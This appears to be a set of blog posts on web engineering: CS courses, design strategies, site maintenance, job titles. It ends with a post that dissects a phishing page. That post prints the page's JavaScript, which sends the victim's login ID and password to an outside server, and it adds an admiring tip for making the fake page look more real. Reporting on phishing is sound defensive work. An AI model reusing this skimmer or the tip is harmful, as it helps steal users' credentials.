Mapping CS Courses to Internet Software Engineering

These aren’t specific courses, the intention is to provide a rough parallel. They aren’t in a particular order, and multi-semester study is implied for some areas.

  • Operating Systems - Particulary Linux. Appreciation of the hardware that makes the system work, especially the server. Understanding of the commands, organization, processing. Use of log files.
  • Computer Architecture - Key concepts - physical elements that make up the machine. Capabilities and limitations. CPUs, memory, disks, interrupts, timing, queues, caching. Performance considerations. Requirements awareness.
  • OOP / Data Structures - Ability to abstract a system into components that can be efficiently operated on. Queues, linked lists, trees, arrays, multi-dimensional arrays, matrices, classes and objects. Methods, properties and events. Vital for server and client side.
  • Algorithms - Appreciation for the impact of how code is written on performance. This is especially important because many web applications are written in interpretive languages. Awareness of high overhead operations (which can be avoided or performed by existing library functions).
  • Logic - The ability to break a problem in to manageable pieces and write efficient code.
  • Systems Analysis - Developing a high level perspective to understand how system components interface and interact. Distribution of requirements.
  • Technical Writing - Written communication is vital to describe the work that will be performed.
  • Assembly Language - A view inside the processor. Although not necessary, it is valuable to understand what the processor is, what it does, how it does it, and how to control it. Complements the OS and Computer Architecture courses.
  • Data Communications / Introduction to Networking - Writing code for the Internet is heavily influenced by its distribution. It is important to know how the data gets from the server to the client and back again. This affects how pages are constructed. Key elements, difference between form and content, compression, bandwidth.
  • Security - Use of encryption, OpenSSL, protecting data, web application firewalls, passwords, ports, server firewalls, watchdogs, etc.
  • Server Software - IIS or Apache. How requests are received, protection of data, efficient use of disk space and bandwidth. Caching. How to create and manage accounts. Use of web stats to monitor sites. Use of log files.
  • Current Industry Trends - Frameworks, template systems, AJAX, toolkits, CDNs.

More Cost-Effective Design Strategies

  • Work within application design architectures. In other words, try to use as much of their HTML and CSS as possible, or replace just the CSS. Most good applications have a nice hierarchical CSS and template organization. Learn to work with it. Many application allow the addition and removal of widgets and tools from the admin interface. Accomodate that and support it. Its is extremely valuable.
  • Use icon sets. They will allow you to provide a beautiful interface in a fraction of the time. http://www.everaldo.com/crystal/. Support these projects if possible, ask your employer.
  • Use toolkits, but carefully. If it is a simple feature, code it yourself. If it is complex, find a toolkit or javascript library.
  • Keep the layout and colors separate in the CSS. That way, you can reskin an application in different ways, easily. Use browser specific overrides where necessary.
  • If you are building an application use a hierarchical template structure and create components that can support the whole system, instead of just one page.

Web Sites - Behind the Scenes

A web site is the most visible part of a companies Internet presence, but not the only part.

The following issues must be continually addressed and frequently monitored:

  • Content Maintenance This includes all content changes. It may also require navigation changes. Many sites use content management systems such as eZ publish, Drupal, or Joomla. These make editing content easier, but still require some training. The content itself is important, but its presentation must also be considered. Web pages should be easy to read, and informative. They should be attractive and consistent with the other pages on the site. The content should be consistent with the language of the target site visitors. If it is a professional site, everything should be spelled properly, cased properly, and with valid grammar. Slang language should be avoided.
  • email Careful use of email accounts and forwarders is important. Forwarders allow the same address to deliver messages to multiple people. In addition, a forwarder can ease personnel transitions, the email address does not have to change if a different person is handling it. email accounts must be budgeted. Disk space is cheap, but it isn’t free. In most cases, the disk space used by email is deducted from the available space for the site. For that reason, one must keep track of the number of accounts and how big each mailbox is. Notification should be set up to ensure people are alerted when their mailbox is full. Issues that can take alot of time include recovering if the domain or server is blacklisted, blocked emails for various reasons, client configuration issues.
  • Contact mechanisms First, one must comply with the anti-spam laws http://www.ftc.gov/bcp/conline/pubs/buspubs/canspam.shtm. Newsletter content can also be a valuable part of a site. In addition, contact mechanisms must be protected from abuse. Tools available include CAPTCHA http://www.captcha.net/, Akismet http://akismet.com/, http://ostermiller.org/contactform/, and custom code.
  • Logs Error and access logs should be checked at least weekly for any unusual entries, for example missing pages or images. Some hacking attempts will show up in the error logs, as file not found errors - usually with distinct URLs, repeated requests into forbidden areas. Restricted areas should not be served, if they are, the web server configuration should be updated to protect them. IP address patterns should be observed to see if requests (potential attacks) are from a specific area. These can be blocked with a firewall. If you have access to the email logs and the server level logs, particularly the SSH and MySQL logs, they should be reviewed as well.
  • Application Management It is extremely important to ensure the applications are up to date. Application upgrades range from a simple button click with Fantastico to complex database and patch or upgrade sequences. As a rule, the cost of these upgrades should be included in maintenance allowances.
  • Security In the unfortunate instance when an application is hacked, it must be cleaned up, and usually the application must be upgraded. These tend to be emergencies and often result in outages. Careful Application Management (above) can greatly reduce these. Credit card and personal data must be handled very carefully (ideally by someone well-qualified :yes: ). https://www.pcisecuritystandards.org/
  • External Interfaces Many sophisticated sites have complex interfaces into payment gateways or web services. This type of code usually requires strong engineering skills.
  • SSL Certificates To support HTTPS for ecommerce and secure access to information, certificates must be purchased, approved, installed, and then renewed as required. Renewal requires reinstallation.
  • Web stat checks Periodic review of the web stats allows an evaluation of the site’s search engine positioning, sources of traffic, keywords, and pages accessed.
  • Performance Site visitors expect a timely display of a site. There are many ways to ensure a site performs well, the best solutions vary by the type of site, however, the following issues are clear: client-side caching should be used, content delivery networks are valuable for offloading the server and the network, images must be optimized - delivered properly through the server and displayed properly by all supported browsers, javascript should be portable and efficient, page construction should be evaluated with tools like http://websiteoptimization.com prior to launch and after major changes.
  • Custom code Custom code should be carefully audited for security. http://phpsec.org, http://www.fortify.com/security-resources/rats.jsp. It should be protected by a web application firewall such as http://modsecurity.org.
  • Quality Assurance Time must be taken to check the site for problems like broken links to external resources, and any problems within the site itself.
  • Technical Quality The quality of code used on a site is visible to all visitors. How it looks in the browser, and the code that delivers it should be high-quality, with current technologies applied properly. Poor displays and bad code can harms a companies reputation and professional image.

Quantifying Professional Titles

It can be difficult to determine the title assignments within a company. However, there are two definite indicators that can be used to assign titles - time spent on production work (as opposed to time spent leading/managing), and the number of employees the person is responsible for.

With this in mind, the following are recommended guidelines:

  • President - Responsible for entire company. 95% of time spent on management.
  • Vice President - Responsible for portion of company. 90% of time spent on management.
  • Director - Responsible for 25 or more people. 85% of time spent on management.
  • Manager - Responsible for 10 or more people. 75% of time spent on management.
  • Supervisor / Team Leader - Responsible for 5 or more people. 50% of time spent on management.

Every company is different, and there are times when people must assume different roles. Although the numbers may be adjusted, permanently or temporarily, they should be identified and used. Small companies do not need all these positions.

Title inflation is silly.

Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered through email, with the above link - claiming maintenance was scheduled. Has some nice text, doesn’t tell you to login, but provides a link so you can. :)

It looks great.

The code below is the phishing code, it catches the login validation and sends it to the sys82.net server, where it can capture your data.


var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);
return false;

The page content is probably copied live from the real site, with the javascript added in by the phishermen.

Page is slow. Would be good to take a screenshot and use that as a background while the real page loads. :yes: